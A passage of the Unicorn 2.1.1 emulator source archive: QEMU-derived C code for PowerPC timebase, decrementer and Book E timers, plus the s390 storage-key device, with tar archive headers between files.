cpu_ppc_hdecr_cb(void *opaque) { PowerPCCPU *cpu = opaque; cpu_ppc_hdecr_excp(cpu); } void cpu_ppc_store_purr(CPUPPCState *env, uint64_t value) { ppc_tb_t *tb_env = env->tb_env; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->purr_offset, value); } static void cpu_ppc_set_tb_clk (void *opaque, uint32_t freq) { CPUPPCState *env = opaque; PowerPCCPU *cpu = env_archcpu(env); ppc_tb_t *tb_env = env->tb_env; tb_env->tb_freq = freq; tb_env->decr_freq = freq; /* There is a bug in Linux 2.4 kernels: * if a decrementer exception is pending when it enables msr_ee at startup, * it's not ready to handle it... 
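 * (Added note: seeding DEC and HDEC with all-ones below parks them as far
 * as possible from the underflow edge, so no decrementer exception is
 * pending when the guest first enables MSR[EE] at boot.)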
*/ _cpu_ppc_store_decr(cpu, 0xFFFFFFFF, 0xFFFFFFFF, 32); _cpu_ppc_store_hdecr(cpu, 0xFFFFFFFF, 0xFFFFFFFF, 32); cpu_ppc_store_purr(env, 0x0000000000000000ULL); } #if 0 static void timebase_save(PPCTimebase *tb) { uint64_t ticks = cpu_get_host_ticks(); PowerPCCPU *first_ppc_cpu = POWERPC_CPU(first_cpu); if (!first_ppc_cpu->env.tb_env) { // error_report("No timebase object"); return; } /* not used anymore, we keep it for compatibility */ tb->time_of_the_day_ns = qemu_clock_get_ns(QEMU_CLOCK_HOST); /* * tb_offset is only expected to be changed by QEMU so * there is no need to update it from KVM here */ tb->guest_timebase = ticks + first_ppc_cpu->env.tb_env->tb_offset; tb->runstate_paused = runstate_check(RUN_STATE_PAUSED); } static void timebase_load(PPCTimebase *tb) { CPUState *cpu; PowerPCCPU *first_ppc_cpu = POWERPC_CPU(first_cpu); int64_t tb_off_adj, tb_off; unsigned long freq; if (!first_ppc_cpu->env.tb_env) { // error_report("No timebase object"); return; } freq = first_ppc_cpu->env.tb_env->tb_freq; tb_off_adj = tb->guest_timebase - cpu_get_host_ticks(); tb_off = first_ppc_cpu->env.tb_env->tb_offset; trace_ppc_tb_adjust(tb_off, tb_off_adj, tb_off_adj - tb_off, (tb_off_adj - tb_off) / freq); /* Set new offset to all CPUs */ CPU_FOREACH(cpu) { PowerPCCPU *pcpu = POWERPC_CPU(cpu); pcpu->env.tb_env->tb_offset = tb_off_adj; kvmppc_set_reg_tb_offset(pcpu, pcpu->env.tb_env->tb_offset); } } void cpu_ppc_clock_vm_state_change(void *opaque, int running, RunState state) { PPCTimebase *tb = opaque; if (running) { timebase_load(tb); } else { timebase_save(tb); } } /* * When migrating a running guest, read the clock just * before migration, so that the guest clock counts * during the events between: * * * vm_stop() * * * * pre_save() * * This reduces clock difference on migration from 5s * to 0.1s (when max_downtime == 5s), because sending the * final pages of memory (which happens between vm_stop() * and pre_save()) takes max_downtime. 
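 * (Added note: in other words, the guest timebase is sampled at vm_stop()
 * time, so the downtime spent sending the final pages does not appear to
 * the guest as a clock jump.)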
*/ static int timebase_pre_save(void *opaque) { PPCTimebase *tb = opaque; /* guest_timebase won't be overridden in case of paused guest */ if (!tb->runstate_paused) { timebase_save(tb); } return 0; } const VMStateDescription vmstate_ppc_timebase = { .name = "timebase", .version_id = 1, .minimum_version_id = 1, .minimum_version_id_old = 1, .pre_save = timebase_pre_save, .fields = (VMStateField []) { VMSTATE_UINT64(guest_timebase, PPCTimebase), VMSTATE_INT64(time_of_the_day_ns, PPCTimebase), VMSTATE_END_OF_LIST() }, }; #endif /* Set up (once) timebase frequency (in Hz) */ clk_setup_cb cpu_ppc_tb_init (CPUPPCState *env, uint32_t freq) { PowerPCCPU *cpu = env_archcpu(env); ppc_tb_t *tb_env; tb_env = g_malloc0(sizeof(ppc_tb_t)); env->tb_env = tb_env; tb_env->flags = PPC_DECR_UNDERFLOW_TRIGGERED; if (is_book3s_arch2x(env)) { /* All Book3S 64bit CPUs implement level based DEC logic */ tb_env->flags |= PPC_DECR_UNDERFLOW_LEVEL; } /* Create new timer */ tb_env->decr_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_ppc_decr_cb, cpu); if (env->has_hv_mode) { tb_env->hdecr_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_ppc_hdecr_cb, cpu); } else { tb_env->hdecr_timer = NULL; } cpu_ppc_set_tb_clk(env, freq); return &cpu_ppc_set_tb_clk; } /* Specific helpers for POWER & PowerPC 601 RTC */ void cpu_ppc601_store_rtcu (CPUPPCState *env, uint32_t value) { _cpu_ppc_store_tbu(env, value); } uint32_t cpu_ppc601_load_rtcu (CPUPPCState *env) { return _cpu_ppc_load_tbu(env); } void cpu_ppc601_store_rtcl (CPUPPCState *env, uint32_t value) { cpu_ppc_store_tbl(env, value & 0x3FFFFF80); } uint32_t cpu_ppc601_load_rtcl (CPUPPCState *env) { return cpu_ppc_load_tbl(env) & 0x3FFFFF80; } /*****************************************************************************/ /* PowerPC 40x timers */ /* PIT, FIT & WDT */ typedef struct ppc40x_timer_t ppc40x_timer_t; struct ppc40x_timer_t { uint64_t pit_reload; /* PIT auto-reload value */ uint64_t fit_next; /* Tick for next FIT interrupt */ QEMUTimer *fit_timer; uint64_t wdt_next; /* Tick for next WDT interrupt */ QEMUTimer *wdt_timer; /* 405 have the PIT, 440 have a DECR. 
*/ unsigned int decr_excp; }; #if 0 /* Fixed interval timer */ static void cpu_4xx_fit_cb (void *opaque) { PowerPCCPU *cpu; CPUPPCState *env; ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; uint64_t now, next; env = opaque; cpu = env_archcpu(env); tb_env = env->tb_env; ppc40x_timer = tb_env->opaque; now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); switch ((env->spr[SPR_40x_TCR] >> 24) & 0x3) { case 0: next = 1 << 9; break; case 1: next = 1 << 13; break; case 2: next = 1 << 17; break; case 3: next = 1 << 21; break; default: /* Cannot occur, but makes gcc happy */ return; } next = now + muldiv64(next, NANOSECONDS_PER_SECOND, tb_env->tb_freq); if (next == now) next++; timer_mod(ppc40x_timer->fit_timer, next); env->spr[SPR_40x_TSR] |= 1 << 26; if ((env->spr[SPR_40x_TCR] >> 23) & 0x1) { ppc_set_irq(cpu, PPC_INTERRUPT_FIT, 1); } LOG_TB("%s: ir %d TCR " TARGET_FMT_lx " TSR " TARGET_FMT_lx "\n", __func__, (int)((env->spr[SPR_40x_TCR] >> 23) & 0x1), env->spr[SPR_40x_TCR], env->spr[SPR_40x_TSR]); } #endif /* Programmable interval timer */ static void start_stop_pit (CPUPPCState *env, ppc_tb_t *tb_env, int is_excp) { #if 0 ppc40x_timer_t *ppc40x_timer; uint64_t now, next; ppc40x_timer = tb_env->opaque; if (ppc40x_timer->pit_reload <= 1 || !((env->spr[SPR_40x_TCR] >> 26) & 0x1) || (is_excp && !((env->spr[SPR_40x_TCR] >> 22) & 0x1))) { /* Stop PIT */ LOG_TB("%s: stop PIT\n", __func__); timer_del(tb_env->decr_timer); } else { LOG_TB("%s: start PIT %016" PRIx64 "\n", __func__, ppc40x_timer->pit_reload); now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); next = now + muldiv64(ppc40x_timer->pit_reload, NANOSECONDS_PER_SECOND, tb_env->decr_freq); if (is_excp) next += tb_env->decr_next - now; if (next == now) next++; timer_mod(tb_env->decr_timer, next); tb_env->decr_next = next; } #endif } #if 0 static void cpu_4xx_pit_cb (void *opaque) { PowerPCCPU *cpu; CPUPPCState *env; ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; env = opaque; cpu = env_archcpu(env); tb_env = env->tb_env; ppc40x_timer = tb_env->opaque; env->spr[SPR_40x_TSR] |= 1 << 27; if ((env->spr[SPR_40x_TCR] >> 26) & 0x1) { ppc_set_irq(cpu, ppc40x_timer->decr_excp, 1); } start_stop_pit(env, tb_env, 1); LOG_TB("%s: ar %d ir %d TCR " TARGET_FMT_lx " TSR " TARGET_FMT_lx " " "%016" PRIx64 "\n", __func__, (int)((env->spr[SPR_40x_TCR] >> 22) & 0x1), (int)((env->spr[SPR_40x_TCR] >> 26) & 0x1), env->spr[SPR_40x_TCR], env->spr[SPR_40x_TSR], ppc40x_timer->pit_reload); } /* Watchdog timer */ static void cpu_4xx_wdt_cb (void *opaque) { PowerPCCPU *cpu; CPUPPCState *env; ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; uint64_t now, next; env = opaque; cpu = env_archcpu(env); tb_env = env->tb_env; ppc40x_timer = tb_env->opaque; now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); switch ((env->spr[SPR_40x_TCR] >> 30) & 0x3) { case 0: next = 1 << 17; break; case 1: next = 1 << 21; break; case 2: next = 1 << 25; break; case 3: next = 1 << 29; break; default: /* Cannot occur, but makes gcc happy */ return; } next = now + muldiv64(next, NANOSECONDS_PER_SECOND, tb_env->decr_freq); if (next == now) next++; LOG_TB("%s: TCR " TARGET_FMT_lx " TSR " TARGET_FMT_lx "\n", __func__, env->spr[SPR_40x_TCR], env->spr[SPR_40x_TSR]); switch ((env->spr[SPR_40x_TSR] >> 30) & 0x3) { case 0x0: case 0x1: timer_mod(ppc40x_timer->wdt_timer, next); ppc40x_timer->wdt_next = next; env->spr[SPR_40x_TSR] |= 1U << 31; break; case 0x2: timer_mod(ppc40x_timer->wdt_timer, next); ppc40x_timer->wdt_next = next; env->spr[SPR_40x_TSR] |= 1 << 30; if ((env->spr[SPR_40x_TCR] >> 27) & 0x1) { ppc_set_irq(cpu, 
PPC_INTERRUPT_WDT, 1); } break; case 0x3: env->spr[SPR_40x_TSR] &= ~0x30000000; env->spr[SPR_40x_TSR] |= env->spr[SPR_40x_TCR] & 0x30000000; switch ((env->spr[SPR_40x_TCR] >> 28) & 0x3) { case 0x0: /* No reset */ break; case 0x1: /* Core reset */ ppc40x_core_reset(cpu); break; case 0x2: /* Chip reset */ ppc40x_chip_reset(cpu); break; case 0x3: /* System reset */ ppc40x_system_reset(cpu); break; } } } #endif void store_40x_pit (CPUPPCState *env, target_ulong val) { ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; tb_env = env->tb_env; ppc40x_timer = tb_env->opaque; LOG_TB("%s val" TARGET_FMT_lx "\n", __func__, val); ppc40x_timer->pit_reload = val; start_stop_pit(env, tb_env, 0); } target_ulong load_40x_pit (CPUPPCState *env) { return cpu_ppc_load_decr(env); } static void ppc_40x_set_tb_clk (void *opaque, uint32_t freq) { CPUPPCState *env = opaque; ppc_tb_t *tb_env = env->tb_env; LOG_TB("%s set new frequency to %" PRIu32 "\n", __func__, freq); tb_env->tb_freq = freq; tb_env->decr_freq = freq; /* XXX: we should also update all timers */ } clk_setup_cb ppc_40x_timers_init (CPUPPCState *env, uint32_t freq, unsigned int decr_excp) { #if 0 ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; tb_env = g_malloc0(sizeof(ppc_tb_t)); env->tb_env = tb_env; tb_env->flags = PPC_DECR_UNDERFLOW_TRIGGERED; ppc40x_timer = g_malloc0(sizeof(ppc40x_timer_t)); tb_env->tb_freq = freq; tb_env->decr_freq = freq; tb_env->opaque = ppc40x_timer; LOG_TB("%s freq %" PRIu32 "\n", __func__, freq); if (ppc40x_timer != NULL) { /* We use decr timer for PIT */ tb_env->decr_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_4xx_pit_cb, env); ppc40x_timer->fit_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_4xx_fit_cb, env); ppc40x_timer->wdt_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_4xx_wdt_cb, env); ppc40x_timer->decr_excp = decr_excp; } #endif return &ppc_40x_set_tb_clk; } /*****************************************************************************/ /* Embedded PowerPC Device Control Registers */ typedef struct ppc_dcrn_t ppc_dcrn_t; struct ppc_dcrn_t { dcr_read_cb dcr_read; dcr_write_cb dcr_write; void *opaque; }; /* XXX: on 460, DCR addresses are 32 bits wide, * using DCRIPR to get the 22 upper bits of the DCR address */ #define DCRN_NB 1024 struct ppc_dcr_t { ppc_dcrn_t dcrn[DCRN_NB]; int (*read_error)(int dcrn); int (*write_error)(int dcrn); }; int ppc_dcr_read (ppc_dcr_t *dcr_env, int dcrn, uint32_t *valp) { ppc_dcrn_t *dcr; if (dcrn < 0 || dcrn >= DCRN_NB) goto error; dcr = &dcr_env->dcrn[dcrn]; if (dcr->dcr_read == NULL) goto error; *valp = (*dcr->dcr_read)(dcr->opaque, dcrn); return 0; error: if (dcr_env->read_error != NULL) return (*dcr_env->read_error)(dcrn); return -1; } int ppc_dcr_write (ppc_dcr_t *dcr_env, int dcrn, uint32_t val) { ppc_dcrn_t *dcr; if (dcrn < 0 || dcrn >= DCRN_NB) goto error; dcr = &dcr_env->dcrn[dcrn]; if (dcr->dcr_write == NULL) goto error; (*dcr->dcr_write)(dcr->opaque, dcrn, val); return 0; error: if (dcr_env->write_error != NULL) return (*dcr_env->write_error)(dcrn); return -1; } int ppc_dcr_register (CPUPPCState *env, int dcrn, void *opaque, dcr_read_cb dcr_read, dcr_write_cb dcr_write) { ppc_dcr_t *dcr_env; ppc_dcrn_t *dcr; dcr_env = env->dcr_env; if (dcr_env == NULL) return -1; if (dcrn < 0 || dcrn >= DCRN_NB) return -1; dcr = &dcr_env->dcrn[dcrn]; if (dcr->opaque != NULL || dcr->dcr_read != NULL || dcr->dcr_write != NULL) return -1; dcr->opaque = opaque; dcr->dcr_read = dcr_read; dcr->dcr_write = dcr_write; return 0; } int ppc_dcr_init (CPUPPCState *env, int (*read_error)(int dcrn), int 
(*write_error)(int dcrn)) { ppc_dcr_t *dcr_env; dcr_env = g_malloc0(sizeof(ppc_dcr_t)); dcr_env->read_error = read_error; dcr_env->write_error = write_error; env->dcr_env = dcr_env; return 0; } /*****************************************************************************/ int ppc_cpu_pir(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; return env->spr_cb[SPR_PIR].default_value; } #if 0 PowerPCCPU *ppc_get_vcpu_by_pir(int pir) { CPUState *cs; CPU_FOREACH(cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); if (ppc_cpu_pir(cpu) == pir) { return cpu; } } return NULL; } #endif void ppc_irq_reset(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; env->irq_input_state = 0; // kvmppc_set_interrupt(cpu, PPC_INTERRUPT_EXT, 0); } ��������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/ppc/ppc_booke.c���������������������������������������������������������������0000664�0000000�0000000�00000027162�14675241067�0017470�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU PowerPC Booke hardware System Emulator * * Copyright (c) 2011 AdaCore * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "hw/ppc/ppc.h" #include "qemu/timer.h" #include "qemu/log.h" // #include "kvm_ppc.h" /* Timer Control Register */ #define TCR_WP_SHIFT 30 /* Watchdog Timer Period */ #define TCR_WP_MASK (0x3U << TCR_WP_SHIFT) #define TCR_WRC_SHIFT 28 /* Watchdog Timer Reset Control */ #define TCR_WRC_MASK (0x3U << TCR_WRC_SHIFT) #define TCR_WIE (1U << 27) /* Watchdog Timer Interrupt Enable */ #define TCR_DIE (1U << 26) /* Decrementer Interrupt Enable */ #define TCR_FP_SHIFT 24 /* Fixed-Interval Timer Period */ #define TCR_FP_MASK (0x3U << TCR_FP_SHIFT) #define TCR_FIE (1U << 23) /* Fixed-Interval Timer Interrupt Enable */ #define TCR_ARE (1U << 22) /* Auto-Reload Enable */ /* Timer Control Register (e500 specific fields) */ #define TCR_E500_FPEXT_SHIFT 13 /* Fixed-Interval Timer Period Extension */ #define TCR_E500_FPEXT_MASK (0xf << TCR_E500_FPEXT_SHIFT) #define TCR_E500_WPEXT_SHIFT 17 /* Watchdog Timer Period Extension */ #define TCR_E500_WPEXT_MASK (0xf << TCR_E500_WPEXT_SHIFT) /* Timer Status Register */ #define TSR_FIS (1U << 26) /* Fixed-Interval Timer Interrupt Status */ #define TSR_DIS (1U << 27) /* Decrementer Interrupt Status */ #define TSR_WRS_SHIFT 28 /* Watchdog Timer Reset Status */ #define TSR_WRS_MASK (0x3U << TSR_WRS_SHIFT) #define TSR_WIS (1U << 30) /* Watchdog Timer Interrupt Status */ #define TSR_ENW (1U << 31) /* Enable Next Watchdog Timer */ typedef struct booke_timer_t booke_timer_t; struct booke_timer_t { uint64_t fit_next; QEMUTimer *fit_timer; uint64_t wdt_next; QEMUTimer *wdt_timer; uint32_t flags; }; static void booke_update_irq(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; ppc_set_irq(cpu, PPC_INTERRUPT_DECR, (env->spr[SPR_BOOKE_TSR] & TSR_DIS && env->spr[SPR_BOOKE_TCR] & TCR_DIE)); ppc_set_irq(cpu, PPC_INTERRUPT_WDT, (env->spr[SPR_BOOKE_TSR] & TSR_WIS && env->spr[SPR_BOOKE_TCR] & TCR_WIE)); ppc_set_irq(cpu, PPC_INTERRUPT_FIT, (env->spr[SPR_BOOKE_TSR] & TSR_FIS && env->spr[SPR_BOOKE_TCR] & TCR_FIE)); } /* Return the location of the bit of time base at which the FIT will raise an interrupt */ static uint8_t booke_get_fit_target(CPUPPCState *env, ppc_tb_t *tb_env) { uint8_t fp = (env->spr[SPR_BOOKE_TCR] & TCR_FP_MASK) >> TCR_FP_SHIFT; if (tb_env->flags & PPC_TIMER_E500) { /* e500 Fixed-interval timer period extension */ uint32_t fpext = (env->spr[SPR_BOOKE_TCR] & TCR_E500_FPEXT_MASK) >> TCR_E500_FPEXT_SHIFT; fp = 63 - (fp | fpext << 2); } else { fp = env->fit_period[fp]; } return fp; } /* Return the location of the bit of time base at which the WDT will raise an interrupt */ static uint8_t booke_get_wdt_target(CPUPPCState *env, ppc_tb_t *tb_env) { uint8_t wp = (env->spr[SPR_BOOKE_TCR] & TCR_WP_MASK) >> TCR_WP_SHIFT; if (tb_env->flags & PPC_TIMER_E500) { /* e500 Watchdog timer period extension */ uint32_t wpext = (env->spr[SPR_BOOKE_TCR] & TCR_E500_WPEXT_MASK) >> TCR_E500_WPEXT_SHIFT; wp = 63 - (wp | wpext << 2); } else { wp = env->wdt_period[wp]; } return wp; } static void booke_update_fixed_timer(CPUPPCState *env, uint8_t target_bit, uint64_t *next, QEMUTimer *timer, int tsr_bit) { #if 0 ppc_tb_t *tb_env = env->tb_env; uint64_t delta_tick, ticks = 0; uint64_t tb; uint64_t period; uint64_t now; if (!(env->spr[SPR_BOOKE_TSR] & tsr_bit)) { /* * Don't arm the timer again when the guest has the current * interrupt still pending. Wait for it to ack it. 
*/ return; } now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); tb = cpu_ppc_get_tb(tb_env, now, tb_env->tb_offset); period = 1ULL << target_bit; delta_tick = period - (tb & (period - 1)); /* the timer triggers only when the selected bit toggles from 0 to 1 */ if (tb & period) { ticks = period; } if (ticks + delta_tick < ticks) { /* Overflow, so assume the biggest number we can express. */ ticks = UINT64_MAX; } else { ticks += delta_tick; } *next = now + muldiv64(ticks, NANOSECONDS_PER_SECOND, tb_env->tb_freq); if ((*next < now) || (*next > INT64_MAX)) { /* Overflow, so assume the biggest number the qemu timer supports. */ *next = INT64_MAX; } /* XXX: If expire time is now. We can't run the callback because we don't * have access to it. So we just set the timer one nanosecond later. */ if (*next == now) { (*next)++; } else { /* * There's no point to fake any granularity that's more fine grained * than milliseconds. Anything beyond that just overloads the system. */ *next = MAX(*next, now + SCALE_MS); } /* Fire the next timer */ timer_mod(timer, *next); #endif } static void booke_decr_cb(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; env->spr[SPR_BOOKE_TSR] |= TSR_DIS; booke_update_irq(cpu); if (env->spr[SPR_BOOKE_TCR] & TCR_ARE) { /* Do not reload 0, it is already there. It would just trigger * the timer again and lead to infinite loop */ if (env->spr[SPR_BOOKE_DECAR] != 0) { /* Auto Reload */ cpu_ppc_store_decr(env, env->spr[SPR_BOOKE_DECAR]); } } } static void booke_fit_cb(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; ppc_tb_t *tb_env; booke_timer_t *booke_timer; tb_env = env->tb_env; booke_timer = tb_env->opaque; env->spr[SPR_BOOKE_TSR] |= TSR_FIS; booke_update_irq(cpu); booke_update_fixed_timer(env, booke_get_fit_target(env, tb_env), &booke_timer->fit_next, booke_timer->fit_timer, TSR_FIS); } static void booke_wdt_cb(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; ppc_tb_t *tb_env; booke_timer_t *booke_timer; tb_env = env->tb_env; booke_timer = tb_env->opaque; /* TODO: There's lots of complicated stuff to do here */ booke_update_irq(cpu); booke_update_fixed_timer(env, booke_get_wdt_target(env, tb_env), &booke_timer->wdt_next, booke_timer->wdt_timer, TSR_WIS); } void store_booke_tsr(CPUPPCState *env, target_ulong val) { PowerPCCPU *cpu = env_archcpu(env); ppc_tb_t *tb_env = env->tb_env; booke_timer_t *booke_timer = tb_env->opaque; env->spr[SPR_BOOKE_TSR] &= ~val; // kvmppc_clear_tsr_bits(cpu, val); if (val & TSR_FIS) { booke_update_fixed_timer(env, booke_get_fit_target(env, tb_env), &booke_timer->fit_next, booke_timer->fit_timer, TSR_FIS); } if (val & TSR_WIS) { booke_update_fixed_timer(env, booke_get_wdt_target(env, tb_env), &booke_timer->wdt_next, booke_timer->wdt_timer, TSR_WIS); } booke_update_irq(cpu); } void store_booke_tcr(CPUPPCState *env, target_ulong val) { PowerPCCPU *cpu = env_archcpu(env); ppc_tb_t *tb_env = env->tb_env; booke_timer_t *booke_timer = tb_env->opaque; env->spr[SPR_BOOKE_TCR] = val; // kvmppc_set_tcr(cpu); booke_update_irq(cpu); booke_update_fixed_timer(env, booke_get_fit_target(env, tb_env), &booke_timer->fit_next, booke_timer->fit_timer, TSR_FIS); booke_update_fixed_timer(env, booke_get_wdt_target(env, tb_env), &booke_timer->wdt_next, booke_timer->wdt_timer, TSR_WIS); } #if 0 static void ppc_booke_timer_reset_handle(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; store_booke_tcr(env, 0); store_booke_tsr(env, -1); } /* * This function will be called whenever the CPU 
state changes. * CPU states are defined "typedef enum RunState". * Regarding timer, When CPU state changes to running after debug halt * or similar cases which takes time then in between final watchdog * expiry happenes. This will cause exit to QEMU and configured watchdog * action will be taken. To avoid this we always clear the watchdog state when * state changes to running. */ static void cpu_state_change_handler(void *opaque, int running, RunState state) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; if (!running) { return; } /* * Clear watchdog interrupt condition by clearing TSR. */ store_booke_tsr(env, TSR_ENW | TSR_WIS | TSR_WRS_MASK); } #endif void ppc_booke_timers_init(PowerPCCPU *cpu, uint32_t freq, uint32_t flags) { ppc_tb_t *tb_env; booke_timer_t *booke_timer; tb_env = g_malloc0(sizeof(ppc_tb_t)); booke_timer = g_malloc0(sizeof(booke_timer_t)); cpu->env.tb_env = tb_env; tb_env->flags = flags | PPC_TIMER_BOOKE | PPC_DECR_ZERO_TRIGGERED; tb_env->tb_freq = freq; tb_env->decr_freq = freq; tb_env->opaque = booke_timer; tb_env->decr_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &booke_decr_cb, cpu); booke_timer->fit_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &booke_fit_cb, cpu); booke_timer->wdt_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &booke_wdt_cb, cpu); #if 0 int ret = 0; ret = kvmppc_booke_watchdog_enable(cpu); if (ret) { /* TODO: Start the QEMU emulated watchdog if not running on KVM. * Also start the QEMU emulated watchdog if KVM does not support * emulated watchdog or somehow it is not enabled (supported but * not enabled is though some bug and requires debugging :)). */ } qemu_add_vm_change_state_handler(cpu_state_change_handler, cpu); qemu_register_reset(ppc_booke_timer_reset_handle, cpu); #endif } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/s390x/������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015457�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/s390x/s390-skeys.c������������������������������������������������������������0000664�0000000�0000000�00000007660�14675241067�0017466�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * s390 storage key device * * Copyright 2015 IBM Corp. * Author(s): Jason J. Herne <jjherne@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. 
*/ #include "qemu/osdep.h" #include "qemu/units.h" #include "target/s390x/cpu.h" #include "hw/s390x/storage-keys.h" #define S390_SKEYS_BUFFER_SIZE (128 * KiB) /* Room for 128k storage keys */ #define S390_SKEYS_SAVE_FLAG_EOS 0x01 #define S390_SKEYS_SAVE_FLAG_SKEYS 0x02 #define S390_SKEYS_SAVE_FLAG_ERROR 0x04 static void s390_skeys_class_init(uc_engine *uc, S390SKeysClass* class); static void qemu_s390_skeys_class_init(uc_engine *uc, S390SKeysClass* skeyclass); static void s390_skeys_instance_init(uc_engine *uc, S390SKeysState* ss); static void qemu_s390_skeys_init(uc_engine *uc, QEMUS390SKeysState *skey); void s390_skeys_init(uc_engine *uc) { S390CPU *cpu = S390_CPU(uc->cpu); s390_skeys_class_init(uc, &cpu->skey); qemu_s390_skeys_class_init(uc, &cpu->skey); s390_skeys_instance_init(uc, (S390SKeysState*)&cpu->ss); qemu_s390_skeys_init(uc, &cpu->ss); cpu->ss.class = &cpu->skey; } static void qemu_s390_skeys_init(uc_engine *uc, QEMUS390SKeysState *skeys) { //QEMUS390SKeysState *skeys = QEMU_S390_SKEYS(obj); //MachineState *machine = MACHINE(qdev_get_machine()); //skeys->key_count = machine->ram_size / TARGET_PAGE_SIZE; // Unicorn: Allow users to configure this value? skeys->key_count = 0x20000000 / TARGET_PAGE_SIZE; skeys->keydata = g_malloc0(skeys->key_count); } static int qemu_s390_skeys_enabled(S390SKeysState *ss) { return 1; } /* * TODO: for memory hotplug support qemu_s390_skeys_set and qemu_s390_skeys_get * will have to make sure that the given gfn belongs to a memory region and not * a memory hole. */ static int qemu_s390_skeys_set(S390SKeysState *ss, uint64_t start_gfn, uint64_t count, uint8_t *keys) { QEMUS390SKeysState *skeydev = QEMU_S390_SKEYS(ss); int i; /* Check for uint64 overflow and access beyond end of key data */ if (start_gfn + count > skeydev->key_count || start_gfn + count < count) { // error_report("Error: Setting storage keys for page beyond the end " // "of memory: gfn=%" PRIx64 " count=%" PRId64, // start_gfn, count); return -EINVAL; } for (i = 0; i < count; i++) { skeydev->keydata[start_gfn + i] = keys[i]; } return 0; } static int qemu_s390_skeys_get(S390SKeysState *ss, uint64_t start_gfn, uint64_t count, uint8_t *keys) { QEMUS390SKeysState *skeydev = QEMU_S390_SKEYS(ss); int i; /* Check for uint64 overflow and access beyond end of key data */ if (start_gfn + count > skeydev->key_count || start_gfn + count < count) { // error_report("Error: Getting storage keys for page beyond the end " // "of memory: gfn=%" PRIx64 " count=%" PRId64, // start_gfn, count); return -EINVAL; } for (i = 0; i < count; i++) { keys[i] = skeydev->keydata[start_gfn + i]; } return 0; } static void qemu_s390_skeys_class_init(uc_engine *uc, S390SKeysClass* skeyclass) { // S390SKeysClass *skeyclass = S390_SKEYS_CLASS(oc); // DeviceClass *dc = DEVICE_CLASS(oc); skeyclass->skeys_enabled = qemu_s390_skeys_enabled; skeyclass->get_skeys = qemu_s390_skeys_get; skeyclass->set_skeys = qemu_s390_skeys_set; /* Reason: Internal device (only one skeys device for the whole memory) */ // dc->user_creatable = false; } static void s390_skeys_instance_init(uc_engine *uc, S390SKeysState* ss) { ss->migration_enabled = true; } static void s390_skeys_class_init(uc_engine *uc, S390SKeysClass* class) { // DeviceClass *dc = DEVICE_CLASS(oc); // dc->hotpluggable = false; // set_bit(DEVICE_CATEGORY_MISC, dc->categories); } 
��������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015576�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/crypto/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017116�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000��������������������������������������������������������